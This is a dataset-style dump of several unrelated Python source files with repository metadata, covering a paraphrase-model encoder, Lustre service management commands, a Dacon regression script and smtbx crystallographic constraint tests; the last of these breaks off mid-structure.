'1167156728.14kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1167156728.14kmuller"]',
'1167175789.09kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1167175789.09kmuller"]',
'1167175832.07kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1167175832.07kmuller"]',
'1167770798.99kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1167770798.99kmuller"]',
'1167770993.8kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1167770993.8kmuller"]',
'1167969614.23kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1167969614.23kmuller"]',
'1167969727.94kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1167969727.94kmuller"]',
'1167969766.85kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1167969766.85kmuller"]',
'1167969844.67kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1167969844.67kmuller"]',
'1167969891.2kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1167969891.2kmuller"]',
'1167969900.36kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1167969900.36kmuller"]',
'1167969936.27kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1167969936.27kmuller"]',
'1167969971.92kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1167969971.92kmuller"]',
'1174672543.93dzlu': '["Objects"]["1156371286.47luzd0"]["Objects"]["1174672543.93dzlu"]',
'1174672701.77dzlu': '["Objects"]["1156371286.47luzd0"]["Objects"]["1174672701.77dzlu"]',
'1176338996.15dzlu': '["Objects"]["1156371286.47luzd0"]["Objects"]["1176338996.15dzlu"]',
'1176339347.32dzlu': '["Objects"]["1156371286.47luzd0"]["Objects"]["1176339347.32dzlu"]',
'1185393793.62kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1185393793.62kmuller"]',
'1185393885.79kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1185393885.79kmuller"]',
'1185393954.26kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1185393954.26kmuller"]',
'1185394014.06kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1185394014.06kmuller"]',
'1185394041.0kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1185394041.0kmuller"]',
'1185394121.67kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1185394121.67kmuller"]',
'1185396291.79kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1185396291.79kmuller"]',
'1185396373.0kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1185396373.0kmuller"]',
'1205366897.45kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1205366897.45kmuller"]',
'1205366965.03kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1205366965.03kmuller"]',
'1228170354.34kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1228170354.34kmuller"]',
'1228170436.83kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1228170436.83kmuller"]',
'1228170440.53kmuller': '["Objects"]["1156371286.47luzd0"]["Objects"]["1228170440.53kmuller"]',
'1257364092.45caoconno': '["Objects"]["1156371286.47luzd0"]["Objects"]["1257364092.45caoconno"]',
'1257364187.71caoconno': '["Objects"]["1156371286.47luzd0"]["Objects"]["1257364187.71caoconno"]',
'1257796324.14caoconno': '["Objects"]["1156371286.47luzd0"]["Objects"]["1257796324.14caoconno"]',
'1257796371.34caoconno': '["Objects"]["1156371286.47luzd0"]["Objects"]["1257796371.34caoconno"]',
'1257796421.79caoconno': '["Objects"]["1156371286.47luzd0"]["Objects"]["1257796421.79caoconno"]',
'1257796421.81caoconno': '["Objects"]["1156371286.47luzd0"]["Objects"]["1257796421.81caoconno"]' } }
extraInfo = {
'camPos': Point3(0, -14, 0),
'camHpr': VBase3(0, 0, 0),
'focalLength': 0.85276538133599999,
'skyState': -1,
'fog': 0 }
| [
"brandoncarden12345@gmail.com"
] | brandoncarden12345@gmail.com |
9da2c36775a99673d80810536059cc0b7380e907 | b0885fde23fff880927c3a6248c7b5a33df670f1 | /models/im_retrieval_transformer/edit_encoder.py | 0e4567075df31d82bd11666f71d482f72c5f7c10 | [] | no_license | mrsalehi/paraphrase-generation | ceb68200e9016c5f26036af565fafa2d736dc96b | 3e8bd36bd9416999b93ed8e8529bfdf83cf4dcdd | refs/heads/master | 2020-07-22T03:50:40.343595 | 2019-08-26T11:29:08 | 2019-08-26T11:29:08 | 207,065,580 | 7 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,640 | py | import tensorflow as tf
from models.common import graph_utils, vocab
from models.common.config import Config
from models.im_all_transformer import edit_encoder
from models.im_all_transformer.edit_encoder import TransformerMicroEditExtractor, WordEmbeddingAccumulator
from models.im_all_transformer.transformer import model_utils
from models.im_all_transformer.transformer.embedding_layer import EmbeddingSharedWeights
OPS_NAME = 'edit_encoder'
class EditEncoderAcc(tf.layers.Layer):
def __init__(self, config, **kwargs):
super().__init__(config, **kwargs)
self.config = config
config.accumulated_dim = config.editor.edit_encoder.edit_dim // 2
self.wa = WordEmbeddingAccumulator(config)
# noinspection PyMethodOverriding
def call(self, src_word_ids, tgt_word_ids,
insert_word_ids, common_word_ids,
src_len, tgt_len, iw_len, cw_len, **kwargs):
with tf.variable_scope('edit_encoder'):
orig_embedding_layer = EmbeddingSharedWeights.get_from_graph()
wa_inserted = self.wa(orig_embedding_layer(insert_word_ids), iw_len)
wa_common = self.wa(orig_embedding_layer(common_word_ids), iw_len)
edit_vector = tf.concat([wa_inserted, wa_common], axis=1)
if self.config.editor.enable_dropout and self.config.editor.dropout > 0.:
edit_vector = tf.nn.dropout(edit_vector, 1. - self.config.editor.dropout)
return edit_vector, (tf.constant([[0.0]]), tf.constant([[0.0]]), tf.constant([[0.0]])), \
(tf.constant([[0.0]]), tf.constant([[0.0]]), tf.constant([[0.0]]))
| [
"ub.maka@gmail.com"
] | ub.maka@gmail.com |
6aaa0670890d94adae6318b188461250bd09151a | e601ff328271d102d6b38259129a588416279a3d | /Snek.py | 919628a5ef5b52837032d57a91758f83bef3c66f | [] | no_license | AlliterativeAnchovies/GameJamYamHam | 383c357adb2375cd7cf2f0cdd846e2824c4e69c1 | cba2c07098a7316d1b415c377151e8ba0902ecdf | refs/heads/master | 2021-05-07T01:27:46.474053 | 2017-11-13T16:55:29 | 2017-11-13T16:55:29 | 110,340,526 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 203 | py |
snekPosition = [0,0]
snekParts = []
def moveSnek(x, y):
snekPosition[0] += x
snekPosition[1] += y
def changeSnekSizeBy(count):
if count > 0:
pass
#snekParts.extend([pass for i in range(count)]) | [
"unconfigured@null.spigotmc.org"
] | unconfigured@null.spigotmc.org |
cb66fb20161657cdfa2e432eef049a08fc5795c3 | b169439ff77e4df4730b1efa09b3f306fbcd979f | /pyclownfish/clownfish_subsystem_service.py | 8f90b175b024d8dc03a87c36ffc03cc8bfe4b7fe | [
"MIT"
] | permissive | KnightKu/clownfish | 76d85030411d520ba3fcd301a796505cbfb863e7 | fb9209e99a22caa84e4ce8a7afa23dce46b0104c | refs/heads/master | 2022-07-28T21:41:40.351343 | 2020-02-16T14:47:08 | 2020-02-16T14:47:08 | 259,587,234 | 0 | 0 | null | 2020-04-28T09:11:14 | 2020-04-28T09:11:13 | null | UTF-8 | Python | false | false | 5,966 | py | # Copyright (c) 2020 DataDirect Networks, Inc.
# All Rights Reserved.
# Author: lixi@ddn.com
"""
Subsystem of service
"""
from pyclownfish import clownfish_command_common
from pylcommon import lustre
SUBSYSTEM_SERVICE_COMMNAD_MOVE = "move"
SUBSYSTEM_SERVICE_NAME = "service"
SUBSYSTEM_SERVICE = clownfish_command_common.Subsystem(SUBSYSTEM_SERVICE_NAME)
def service_move_usage(log):
"""
Usage of moving service
"""
log.cl_stdout("""Usage: %s %s <service_name> <hostname>
service_name: a Lustre service name, e.g. fsname-OST000a""" %
(SUBSYSTEM_SERVICE_NAME,
SUBSYSTEM_SERVICE_COMMNAD_MOVE))
def service_move(connection, args):
"""
move the service(s)
"""
# pylint: disable=too-many-branches
log = connection.cc_command_log
if ((clownfish_command_common.CLOWNFISH_OPTION_SHORT_HELP in args) or
(clownfish_command_common.CLOWNFISH_OPTION_LONG_HELP in args)):
service_move_usage(log)
return 0
instance = connection.cc_instance
if len(args) != 2:
service_move_usage(log)
return -1
service_name = args[0]
hostname = args[1]
service = instance.ci_name2service(service_name)
if service is None:
log.cl_error("invalid service name [%s]", service_name)
return -1
found = False
for host in service.ls_hosts():
if host.sh_hostname == hostname:
found = True
break
if not found:
log.cl_error("service [%s] doesn't have any instance on host [%s]",
service_name, hostname)
return -1
if service.ls_service_type == lustre.LUSTRE_SERVICE_TYPE_MGT:
ret = service.ls_mount(log, hostname=hostname)
else:
ret = service.ls_lustre_fs.lf_mount_service(log, service, hostname=hostname)
return ret
def service_move_argument(connection, complete_status):
"""
Return argument that can be filesystem's service
"""
instance = connection.cc_instance
line = complete_status.ccs_line
line_finished = line[0:complete_status.ccs_begidx]
fields = line_finished.split()
field_number = len(fields)
# fields[0] and fields[1] should be "service" and "move"
if field_number < 2:
return []
elif field_number == 2:
candidates = []
for lustrefs in instance.ci_lustres.values():
for service in lustrefs.lf_service_dict.itervalues():
if service.ls_service_name not in candidates:
candidates.append(service.ls_service_name)
for mgs in instance.ci_mgs_dict.values():
if mgs.ls_service_name not in candidates:
candidates.append(mgs.ls_service_name)
return candidates
elif field_number == 3:
service = instance.ci_name2service(fields[2])
if service is None:
return []
candidates = []
for host in service.ls_hosts():
candidates.append(host.sh_hostname)
return candidates
else:
return []
COMMAND = clownfish_command_common.ClownfishCommand(SUBSYSTEM_SERVICE_COMMNAD_MOVE, service_move)
COMMAND.cc_add_argument(service_move_argument)
SUBSYSTEM_SERVICE.ss_command_dict[SUBSYSTEM_SERVICE_COMMNAD_MOVE] = COMMAND
SUBSYSTEM_SERVICE_COMMNAD_UMOUNT = "umount"
def service_umount_usage(log):
"""
Usage of moving service
"""
log.cl_stdout("""Usage: %s %s <service_name>...
service_name: a Lustre service name, e.g. fsname-OST000a""" %
(SUBSYSTEM_SERVICE_NAME,
SUBSYSTEM_SERVICE_COMMNAD_UMOUNT))
def service_umount(connection, args):
"""
umount the service(s)
"""
# pylint: disable=too-many-branches
log = connection.cc_command_log
if ((clownfish_command_common.CLOWNFISH_OPTION_SHORT_HELP in args) or
(clownfish_command_common.CLOWNFISH_OPTION_LONG_HELP in args)):
service_umount_usage(log)
return 0
instance = connection.cc_instance
for service_name in args:
service = instance.ci_name2service(service_name)
if service is None:
log.cl_stderr("service name [%s] is not configured in Clownfish", service_name)
return -1
if service.ls_service_type == lustre.LUSTRE_SERVICE_TYPE_MGT:
ret = service.ls_umount(log)
else:
ret = service.ls_lustre_fs.lf_umount_service(log, service)
if ret:
return ret
return ret
def service_umount_argument(connection, complete_status):
"""
Return argument that can be filesystem's service
"""
instance = connection.cc_instance
line = complete_status.ccs_line
line_finished = line[0:complete_status.ccs_begidx]
fields = line_finished.split()
field_number = len(fields)
# fields[0] and fields[1] should be "service" and "umount"
if field_number < 2:
return []
elif field_number == 2:
candidates = []
for lustrefs in instance.ci_lustres.values():
for service in lustrefs.lf_service_dict.itervalues():
if service.ls_service_name not in candidates:
candidates.append(service.ls_service_name)
for mgs in instance.ci_mgs_dict.values():
if mgs.ls_service_name not in candidates:
candidates.append(mgs.ls_service_name)
return candidates
elif field_number == 3:
service = instance.ci_name2service(fields[2])
if service is None:
return []
candidates = []
for host in service.ls_hosts():
candidates.append(host.sh_hostname)
return candidates
else:
return []
COMMAND = clownfish_command_common.ClownfishCommand(SUBSYSTEM_SERVICE_COMMNAD_UMOUNT, service_umount)
COMMAND.cc_add_argument(service_umount_argument)
SUBSYSTEM_SERVICE.ss_command_dict[SUBSYSTEM_SERVICE_COMMNAD_UMOUNT] = COMMAND
| [
"lixi@ddn.com"
] | lixi@ddn.com |
2773b3c2eb933aa1def2296c9be9cc09597c93b0 | 369e260e100db9ab5cc8b1711e99ef5e49aec173 | /data/dacon/comp1/dacon1_8_feature_importances.py | 63fbb471f1ea288e16cd5ce5ffd2e0ab4d5872ed | [] | no_license | HWALIMLEE/study | 7aa4c22cb9d7f7838634d984df96eed75f7aefea | 8336adc8999126258fe328d6b985a48e32667852 | refs/heads/master | 2023-03-26T09:11:19.606085 | 2021-03-29T23:03:04 | 2021-03-29T23:03:04 | 259,555,730 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,666 | py | import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
train=pd.read_csv('./data/dacon/comp1/train.csv',header=0,index_col=0) #0행이 header, 0열이 index/ header와 index모두 존재
test=pd.read_csv('./data/dacon/comp1/test.csv',header=0, index_col=0)
submission=pd.read_csv('./data/dacon/comp1/sample_submission.csv',header=0,index_col=0)
print("train.shape:",train.shape) # (10000, 75) # x_train , x_test , y_train , y_test/ 평가도 train으로
print("test.shape:",test.shape) # (10000, 71) # x_predict가 된다 # y값이 없다
print("submission.shape:",submission.shape) # (10000, 4) # y_predict가 된다
# test + submission = train
# test는 y값이 없음
#이상치는 알 수 없으나 결측치는 알 수 있다.
print(train.isnull().sum())
train=train.interpolate() #보간법//선형//완벽하진 않으나 평타 85%//컬럼별로 선을 잡아서 빈자리 선에 맞게 그려준다//컬럼별 보간
train=train.fillna(method='bfill')
print(train.isnull().sum())
print("train:",train.head())
print(test.isnull().sum())
test=test.interpolate()
test=test.fillna(method='bfill')
print("test:",test.head())
np.save('./data/comp1_train.npy',arr=train)
np.save('./data/comp1_test.npy',arr=test)
# 1. 데이터
train=np.load('./data/comp1_train.npy')
test=np.load('./data/comp1_test.npy')
from sklearn.model_selection import train_test_split, RandomizedSearchCV
from keras.layers import Dense, LSTM, Conv2D, MaxPooling2D, Flatten, Input
from keras.models import Sequential, Model
from sklearn.preprocessing import StandardScaler, MinMaxScaler, RobustScaler
from sklearn.decomposition import PCA
from sklearn.model_selection import KFold, cross_val_score
from sklearn.neighbors import KNeighborsRegressor
from sklearn.ensemble import RandomForestRegressor
from sklearn.pipeline import Pipeline
import warnings
from sklearn.tree import DecisionTreeRegressor
x=train[0:,0:71]
y=train[0:,71:]
print("x.shape:",x.shape) # (10000, 71)
print("y.shape:",y.shape) # (10000, 4)
x_train,x_test,y_train,y_test=train_test_split(x,y,test_size=0.2, random_state=60)
print("x_train.shape:",x_train.shape)
print("x_test.shape:",x_test.shape)
print("x_train",x_train)
print("x_test",x_test)
parameters={
'min_samples_leaf':[1,2,4,8,16],
'min_samples_split':[1,2,4,8,16]
}
warnings.simplefilter(action='ignore', category=FutureWarning)
#kfold
kfold=KFold(n_splits=5,shuffle=True)
#pipeline
# pipe = Pipeline([("scaler",StandardScaler()),('model',RandomForestRegressor())])
#모델구성
model=RandomizedSearchCV(DecisionTreeRegressor(),parameters,cv=kfold,n_jobs=-1)
#모델훈련
model.fit(x_train,y_train)
print("최적의 매개변수=",model.best_estimators_.feature_importances_)
"""
import matplotlib.pyplot as plt
import numpy as np
def plot_feature_importances_(model):
n_features=train.data.shape[1]
plt.barh(np.arange(n_features),model.feature_importances_, align='center')
plt.yticks(np.arange(n_features),model.feature_names)
plt.xlabel("Feature importance")
plt.ylabel("Features")
plt.ylim(-1,n_features)
plt.subplots(figsize=(15,6))
plot_feature_importances_(model)
plt.show()
"""
"""
#평가, 예측
y_predict=model.predict(x_test)
result=model.predict(test)
from sklearn.metrics import mean_absolute_error
mae=mean_absolute_error(y_test,y_predict)
print("mae:",mae)
a = np.arange(10000,20000)
#np.arange--수열 만들때
submission = result
submission = pd.DataFrame(submission, a)
submission.to_csv("./data/dacon/comp1/sample_submission1_7.csv", header = ["hhb", "hbo2", "ca", "na"], index = True, index_label="id" )
"""
mae: 1.537
"""
"""
| [
"hwalim9612@gmail.com"
] | hwalim9612@gmail.com |
a419d98b7e7020b5597fbd248dee1c7eec735a51 | 09e5cfe06e437989a2ccf2aeecb9c73eb998a36c | /modules/cctbx_project/smtbx/refinement/constraints/tests/tst_constrained_structure.py | 26b0ce0053bab5553d753b971f90eeb004be5266 | [
"BSD-3-Clause-LBNL",
"BSD-3-Clause"
] | permissive | jorgediazjr/dials-dev20191018 | b81b19653624cee39207b7cefb8dfcb2e99b79eb | 77d66c719b5746f37af51ad593e2941ed6fbba17 | refs/heads/master | 2020-08-21T02:48:54.719532 | 2020-01-25T01:41:37 | 2020-01-25T01:41:37 | 216,089,955 | 0 | 1 | BSD-3-Clause | 2020-01-25T01:41:39 | 2019-10-18T19:03:17 | Python | UTF-8 | Python | false | false | 28,930 | py | from __future__ import absolute_import, division, print_function
from operator import itemgetter
from cctbx import crystal, xray
from cctbx.array_family import flex
from smtbx.refinement import constraints
import smtbx.refinement.constraints.all as _
import smtbx.refinement.constraints as core
import smtbx.utils
from smtbx.refinement import least_squares
from smtbx import development
from scitbx.lstbx import normal_eqns_solving
from scitbx import matrix
from six.moves import zip
class test_case(object):
expected_reparametrisation_for_hydrogen_named = None
expected_mapping_to_grad_fc = None
def __init__(self, normal_eqns_solving_method):
self.normal_eqns_solving_method = normal_eqns_solving_method
def check_reparametrisation_construction(self):
warned_once = False
for sc, params in zip(
self.reparametrisation.structure.scatterers(),
self.reparametrisation.asu_scatterer_parameters
):
if sc.scattering_type != 'H':
assert (
(isinstance(params.site, core.independent_site_parameter)
and
isinstance(params.u, core.independent_u_star_parameter)
)
or
(isinstance(params.site, core.special_position_site_parameter)
and
isinstance(params.u, core.special_position_u_star_parameter))
)
assert params.site.scatterers[0].label == sc.label
assert params.u.scatterers[0].label == sc.label
assert isinstance(params.occupancy,
core.independent_occupancy_parameter)
assert params.occupancy.scatterers[0].label == sc.label
else:
try:
(expected_type, expected_pivot) = \
self.expected_reparametrisation_for_hydrogen_named[sc.label]
assert isinstance(params.site, expected_type), \
(sc.label, params.site, expected_type)
assert ([ sc1.label for sc1 in params.site.argument(0).scatterers ]
== [expected_pivot]), sc.label
except KeyError:
if not warned_once:
print("Warning: incomplete test coverage for H constraint types")
warned_once = True
continue
self.check_reparametrisation_construction_more()
def check_reparametrisation_construction_more(self):
""" To be overriden by heirs that needs to perform extra tests """
def check_mapping_to_grad_fc(self):
if self.expected_mapping_to_grad_fc is not None:
assert (tuple(self.reparametrisation.mapping_to_grad_fc)
== self.expected_mapping_to_grad_fc)
else:
print("No mapping to grad Fc test")
def check_refinement_stability(self):
if not self.shall_refine_thermal_displacements:
for sc in self.xray_structure.scatterers():
sc.flags.set_grad_site(True)
if sc.flags.use_u_aniso(): sc.flags.set_grad_u_aniso(False)
if sc.flags.use_u_iso(): sc.flags.set_grad_u_iso(False)
xs = self.xray_structure
xs0 = self.reference_xray_structure = xs.deep_copy_scatterers()
mi = xs0.build_miller_set(anomalous_flag=False, d_min=0.5)
fo_sq = mi.structure_factors_from_scatterers(
xs0, algorithm="direct").f_calc().norm()
fo_sq = fo_sq.customized_copy(sigmas=flex.double(fo_sq.size(), 1))
xs.shake_sites_in_place(rms_difference=0.1)
if self.shall_refine_thermal_displacements:
# a spread of 10 for u_iso's would be enormous for our low temperature
# test structures if those u_iso's were not constrained
xs.shake_adp(spread=10, # absolute
aniso_spread=0.2) # relative
self.reparametrisation = constraints.reparametrisation(
xs, self.constraints, self.connectivity_table,
temperature=self.t_celsius)
obs = fo_sq.as_xray_observations()
ls = least_squares.crystallographic_ls(
obs,
self.reparametrisation,
weighting_scheme=least_squares.mainstream_shelx_weighting())
self.cycles = self.normal_eqns_solving_method(ls)
print ("%i %s iterations to recover from shaking"
% (self.cycles.n_iterations,
self.cycles))
if 0:
from crys3d.qttbx.xray_structure_viewer import display
display(xray_structure=xs)
diff = xray.meaningful_site_cart_differences(xs0, xs)
assert diff.max_absolute() < self.site_refinement_tolerance,\
self.__class__.__name__
if self.shall_refine_thermal_displacements:
delta_u = []
for sc, sc0 in zip(xs.scatterers(), xs0.scatterers()):
if not sc.flags.use_u_aniso() or not sc0.flags.use_u_aniso(): continue
delta_u.extend(matrix.col(sc.u_star) - matrix.col(sc0.u_star))
delta_u = flex.double(delta_u)
assert flex.max_absolute(delta_u) < self.u_star_refinement_tolerance,\
self.__class__.__name__
def display_structure(self):
from crys3d.qttbx.xray_structure_viewer import display
display(xray_structure=self.xray_structure)
def run(self):
print("[ %s ]" % self.__class__.__name__)
self.connectivity_table = smtbx.utils.connectivity_table(
self.xray_structure)
for sc in self.xray_structure.scatterers():
sc.flags.set_grad_site(True)
if sc.flags.use_u_aniso(): sc.flags.set_grad_u_aniso(True)
if sc.flags.use_u_iso(): sc.flags.set_grad_u_iso(True)
self.reparametrisation = constraints.reparametrisation(
self.xray_structure,
self.constraints,
self.connectivity_table,
temperature=self.t_celsius,
)
self.check_reparametrisation_construction()
self.check_mapping_to_grad_fc()
# above settings are customised in the following tests
self.check_refinement_stability()
class sucrose_test_case(test_case):
"""
sucrose from Olex 2 samples
Notes:
- atom H2A has been moved down the list to test non-contiguous indices
in argument 'constrained_site_indices'
- the sites of H12A and H12B have been swapped (this is purely conventional:
it turns out that the smtbx code does not follow that of ShelXL which
was used to produce this structure in the first place)
"""
def __init__(self, m):
test_case.__init__(self, m)
self.xray_structure = development.sucrose()
self.t_celsius = 20
self.shall_refine_thermal_displacements = False
self.constraints = [
_.terminal_tetrahedral_xh_site(
rotating=True,
pivot=1,
constrained_site_indices=(2,)),
_.terminal_tetrahedral_xh_site(
rotating=True,
pivot=3,
constrained_site_indices=(4,)),
_.terminal_tetrahedral_xh_site(
rotating=True,
pivot=5,
constrained_site_indices=(6,)),
_.terminal_tetrahedral_xh_site(
rotating=True,
pivot=7,
constrained_site_indices=(8,)),
_.terminal_tetrahedral_xh_site(
rotating=True,
pivot=10,
constrained_site_indices=(11,)),
_.terminal_tetrahedral_xh_site(
rotating=True,
pivot=12,
constrained_site_indices=(13,)),
_.terminal_tetrahedral_xh_site(
rotating=True,
pivot=14,
constrained_site_indices=(15,)),
_.terminal_tetrahedral_xh_site(
rotating=True,
pivot=16,
constrained_site_indices=(17,)),
_.tertiary_xh_site(
pivot=19,
constrained_site_indices=(20,)),
_.secondary_xh2_sites(
pivot=21,
flapping = True,
constrained_site_indices=(26, 22)),
_.tertiary_xh_site(
pivot=23,
constrained_site_indices=(24,)),
_.tertiary_xh_site(
pivot=25,
constrained_site_indices=(27,)),
_.tertiary_xh_site(
pivot=28,
constrained_site_indices=(29,)),
_.tertiary_xh_site(
pivot=30,
constrained_site_indices=(31,)),
_.secondary_xh2_sites(
pivot=33,
flapping = True,
constrained_site_indices=(35, 34)),
_.tertiary_xh_site(
pivot=36,
constrained_site_indices=(37,)),
_.tertiary_xh_site(
pivot=38,
constrained_site_indices=(39,)),
_.tertiary_xh_site(
pivot=40,
constrained_site_indices=(41,)),
_.secondary_xh2_sites(
pivot=42,
flapping = True,
constrained_site_indices=(43, 44)),
]
self.expected_reparametrisation_for_hydrogen_named = {
"H2": (core.terminal_tetrahedral_xh_site, 'O2'),
"H3": (core.terminal_tetrahedral_xh_site, 'O3'),
"H4": (core.terminal_tetrahedral_xh_site, 'O4'),
"H5": (core.terminal_tetrahedral_xh_site, 'O5'),
"H7": (core.terminal_tetrahedral_xh_site, 'O7'),
"H8": (core.terminal_tetrahedral_xh_site, 'O8'),
"H9": (core.terminal_tetrahedral_xh_site, 'O9'),
"H10": (core.terminal_tetrahedral_xh_site, 'O10'),
"H1": (core.tertiary_xh_site, 'C1'),
"H2A": (core.secondary_xh2_sites, 'C2'),
"H2B": (core.secondary_xh2_sites, 'C2'),
"H3B": (core.tertiary_xh_site, 'C3'),
"H4B": (core.tertiary_xh_site, 'C4'),
"H5B": (core.tertiary_xh_site, 'C5'),
"H6": (core.tertiary_xh_site, 'C6'),
"H8A": (core.secondary_xh2_sites, 'C8'),
"H8B": (core.secondary_xh2_sites, 'C8'),
"H9B": (core.tertiary_xh_site, 'C9'),
"H10B": (core.tertiary_xh_site, 'C10'),
"H11": (core.tertiary_xh_site, 'C11'),
"H12A": (core.secondary_xh2_sites, 'C12'),
"H12B": (core.secondary_xh2_sites, 'C12'),
}
self.expected_mapping_to_grad_fc = (
59,60,61 , # O1.site
80,81,82,83,84,85 , # O1.u
0,1,2 , # O2.site
86,87,88,89,90,91 , # O2.u
304,305,306 , # H2.site
92 , # H2.u
7,8,9 , # O3.site
93,94,95,96,97,98 , # O3.u
307,308,309 , # H3.site
99 , # H3.u
14,15,16 , # O4.site
100,101,102,103,104,105 , # O4.u
310,311,312 , # H4.site
106 , # H4.u
21,22,23 , # O5.site
107,108,109,110,111,112 , # O5.u
313,314,315 , # H5.site
113 , # H5.u
76,77,78 , # O6.site
114,115,116,117,118,119 , # O6.u
28,29,30 , # O7.site
120,121,122,123,124,125 , # O7.u
316,317,318 , # H7.site
126 , # H7.u
35,36,37 , # O8.site
127,128,129,130,131,132 , # O8.u
319,320,321 , # H8.site
133 , # H8.u
42,43,44 , # O9.site
134,135,136,137,138,139 , # O9.u
322,323,324 , # H9.site
140 , # H9.u
49,50,51 , # O10.site
141,142,143,144,145,146 , # O10.u
325,326,327 , # H10.site
147 , # H10.u
66,67,68 , # O11.site
148,149,150,151,152,153 , # O11.u
56,57,58 , # C1.site
154,155,156,157,158,159 , # C1.u
328,329,330 , # H1.site
160 , # H1.u
3,4,5 , # C2.site
161,162,163,164,165,166 , # C2.u
334,335,336 , # H2B.site
167 , # H2B.u
10,11,12 , # C3.site
168,169,170,171,172,173 , # C3.u
337,338,339 , # H3B.site
174 , # H3B.u
17,18,19 , # C4.site
175,176,177,178,179,180 , # C4.u
331,332,333 , # H2A.site
181 , # H2A.u
340,341,342 , # H4B.site
182 , # H4B.u
24,25,26 , # C5.site
183,184,185,186,187,188 , # C5.u
343,344,345 , # H5B.site
189 , # H5B.u
63,64,65 , # C6.site
190,191,192,193,194,195 , # C6.u
346,347,348 , # H6.site
196 , # H6.u
69,70,71 , # C7.site
197,198,199,200,201,202 , # C7.u
52,53,54 , # C8.site
203,204,205,206,207,208 , # C8.u
352,353,354 , # H8A.site
209 , # H8A.u
349,350,351 , # H8B.site
210 , # H8B.u
45,46,47 , # C9.site
211,212,213,214,215,216 , # C9.u
355,356,357 , # H9B.site
217 , # H9B.u
38,39,40 , # C10.site
218,219,220,221,222,223 , # C10.u
358,359,360 , # H10B.site
224 , # H10B.u
73,74,75 , # C11.site
225,226,227,228,229,230 , # C11.u
361,362,363 , # H11.site
231 , # H11.u
31,32,33 , # C12.site
232,233,234,235,236,237 , # C12.u
364,365,366 , # H12B.site
238 , # H12B.u
367,368,369 , # H12A.site
239 , # H12A.u
)
self.site_refinement_tolerance = 1e-4
class saturated_test_case(test_case):
""" Durham database: 03srv020
H1N and H2N sites and u's have been swapped.
"""
def __init__(self, m):
test_case.__init__(self, m)
self.xray_structure = xray.structure(
crystal_symmetry=crystal.symmetry(
unit_cell=(3.753, 14.54, 15.868, 90, 92.58, 90),
space_group_symbol='hall: -P 2ybc (x-z,y,z)'),
scatterers=flex.xray_scatterer((
xray.scatterer( #0
label='O1',
site=(0.299733, 0.262703, 0.397094),
u=(0.003622, 0.000123, 0.000108,
0.000154, -0.000304, -0.000017)),
xray.scatterer( #1
label='O2',
site=(0.606432, 0.145132, 0.437285),
u=(0.004117, 0.000149, 0.000118,
0.000405, -0.000117, -0.000042)),
xray.scatterer( #2
label='N1',
site=(0.481175, 0.221358, 0.451529),
u=(0.001750, 0.000091, 0.000090,
0.000016, -0.000027, -0.000000)),
xray.scatterer( #3
label='N2',
site=(0.669716, 0.393801, 0.763893),
u=(0.002874, 0.000122, 0.000071,
0.000168, -0.000071, -0.000000)),
xray.scatterer( #4
label='H1N',
site=(0.777763, 0.365311, 0.806784),
u=0.042273),
xray.scatterer( #5
label='H2N',
site=(0.589373, 0.450143, 0.770096),
u=0.042273),
xray.scatterer( #6
label='C1',
site=(0.542801, 0.263225, 0.532794),
u=(0.001423, 0.000084, 0.000076,
-0.000009, 0.000000, -0.000003)),
xray.scatterer( #7
label='C2',
site=(0.718203, 0.216166, 0.600719),
u=(0.001241, 0.000081, 0.000088,
-0.000011, 0.000023, 0.000009)),
xray.scatterer( #8
label='C3',
site=(0.754550, 0.260840, 0.677732),
u=(0.001553, 0.000097, 0.000079,
0.000044, -0.000014, 0.000019)),
xray.scatterer( #9
label='H3',
site=(0.868083, 0.229804, 0.724284),
u=0.031215),
xray.scatterer( #10
label='C4',
site=(0.627437, 0.351296, 0.688971),
u=(0.001601, 0.000093, 0.000075,
0.000015, 0.000027, 0.000004)),
xray.scatterer( #11
label='C5',
site=(0.454744, 0.396843, 0.619275),
u=(0.001302, 0.000082, 0.000083,
-0.000002, -0.000011, 0.000007)),
xray.scatterer( #12
label='C6',
site=(0.414545, 0.352153, 0.542558),
u=(0.001310, 0.000086, 0.000080,
0.000014, -0.000038, 0.000012)),
xray.scatterer( #13
label='H6',
site=(0.298067, 0.382503, 0.496003),
u=0.028457),
xray.scatterer( #14
label='C7',
site=(0.870740, 0.125780, 0.594964),
u=(0.001485, 0.000100, 0.000087,
0.000015, 0.000006, 0.000009)),
xray.scatterer( #15
label='C8',
site=(1.017756, 0.053520, 0.594148),
u=(0.002161, 0.000095, 0.000112,
0.000070, 0.000030, 0.000015)),
xray.scatterer( #16
label='H8',
site=(1.135411, -0.004309, 0.593494),
u=0.039284),
xray.scatterer( #17
label='C9',
site=(0.317957, 0.487839, 0.631013),
u=(0.001562, 0.000101, 0.000080,
0.000008, -0.000022, 0.000009)),
xray.scatterer( #18
label='C10',
site=(0.204108, 0.561746, 0.646136),
u=(0.001931, 0.000100, 0.000123,
0.000052, -0.000025, -0.000002)),
xray.scatterer( #19
label='H10',
